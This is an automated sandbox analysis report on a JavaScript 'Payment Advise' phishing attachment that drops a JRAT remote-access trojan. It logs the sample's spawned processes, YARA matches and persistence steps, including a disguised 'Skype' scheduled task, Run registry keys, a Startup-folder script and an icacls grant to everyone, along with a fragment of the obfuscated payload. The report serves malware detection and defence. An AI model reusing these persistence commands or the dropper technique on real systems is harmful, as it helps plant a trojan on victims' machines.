Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3540:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3164:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1964:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:476:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_01
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: 35Payment Advise - 201903140987758292 copy_2.jsInitial sample: Strings found which are bigger than 50
Reads the hosts fileShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hosts
Tries to load missing DLLsShow sources
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\icacls.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeSection loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeSection loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeSection loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeSection loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeSection loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeSection loaded: wow64log.dll
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exeSection loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wow64log.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64log.dll
Yara signature matchShow sources
Source: 00000004.00000003.7656863427.0000000002B10000.00000004.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: C:\Users\CRAIGH~1\AppData\Local\Temp\_0.77942883373632286473112401160232438.class, type: DROPPEDMatched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: C:\Users\user\OdoQgwznLPI\fyTWDUKVDRn.jNMMAX, type: DROPPEDMatched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Source: C:\Users\user\AppData\Roaming\ufvkaboule.txt, type: DROPPEDMatched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
Classification labelShow sources
Source: classification engineClassification label: mal100.spre.troj.expl.evad.winJS@62/29@28/1
Creates files inside the user directoryShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\jQhqDpyueS.jsJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile created: C:\Users\CRAIGH~1\AppData\Local\Temp\hsperfdata_userJump to behavior
Executable is probably coded in javaShow sources
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeSection loaded: C:\Program Files (x86)\Java\jre1.8.0_171\bin\client\jvm.dllJump to behavior
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Reads ini filesShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\35Payment Advise - 201903140987758292 copy_2.js'
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\jQhqDpyueS.js'
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js'
Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt'
Source: unknownProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1333639532.jar'
Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt'
Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer757169862.jar'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js'
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\RoamingServer757169862.jar'
Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt'
Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1540907542.jar'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js'
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\RoamingServer1540907542.jar'
Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\ufvkaboule.txt'
Source: unknownProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe' -jar C:\Users\CRAIGH~1\AppData\Local\Temp\_0.77942883373632286473112401160232438.class
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IyFfaseYOW.js'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: unknownProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive7989435855425943881.vbs
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\jQhqDpyueS.js' Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\ufvkaboule.txt'Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js' Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt'Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.jsJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)MJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1333639532.jar'Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer757169862.jar'Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw' -jar 'C:\Users\user\AppData\RoamingServer1540907542.jar'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exe' -jar C:\Users\CRAIGH~1\AppData\Local\Temp\_0.77942883373632286473112401160232438.class
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive7989435855425943881.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\java.exeProcess created: unknown unknown
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive1973602545167020741.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\CRAIGH~1\AppData\Local\Temp\Retrive6603369485550255976.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Submission file is bigger than most known malware samplesShow sources
Source: 35Payment Advise - 201903140987758292 copy_2.jsStatic file information: File size 1765207 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior

Data Obfuscation:

barindex
JavaScript source code contains large arrays or strings with random content potentially encoding malicious codeShow sources
Source: 35Payment Advise - 201903140987758292 copy_2.jsString : entropy: 5.55, length: 1761732, content: "d!-!FyIGxvb!-!dUZXh0MSA9ICJkbUZ5SUVOaGJHeGxjbEpsWVdOMFNsTWdQU0J1WlhjZ1JuVnVZM1JwYjI0b0tUc05DZzBLW!-Go to definition
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0563C0E3 push es; iretd 5_2_0563C0E4
Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0563BF2D push ecx; ret 5_2_0563BF2E
Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0650E294 push es; ret 5_2_0650E298
Source: C:\Windows\SysWOW64\wscript.exeCode function: 5_2_0650F8CA push es; retf 5_2_0650F8D8

Boot Survival:

barindex
Creates autostart registry keys to launch javaShow sources
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgr "C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\rnmbjgzzvs.txt"Jump to behavior
Creates multiple autostart registry keysShow sources
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Server
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 0IDR124VF6Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgrJump to behavior
Drops script or batch files to the startup folderShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IyFfaseYOW.js
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IyFfaseYOW.jsJump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\user\AppData\Roaming\IyFfaseYOW.js
Creates a start menu entry (Start Menu\Programs\Startup)Show sources
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IyFfaseYOW.jsJump to behavior
Stores files to the Windows start menu directoryShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IyFfaseYOW.jsJump to behavior
Creates an autostart registry keyShow sources
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgrJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgrJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgrJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ntfsmgrJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 0IDR124VF6Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 0IDR124VF6Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ServerJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ServerJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ServerJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ServerJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Server
Source: C:\Program Files (x86)\Java\jre1.8.0_171\bin\javaw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Server

Hooking and other Techniques for Hiding and Protection:

barindex
Uses cacls to modify the permissions of filesShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
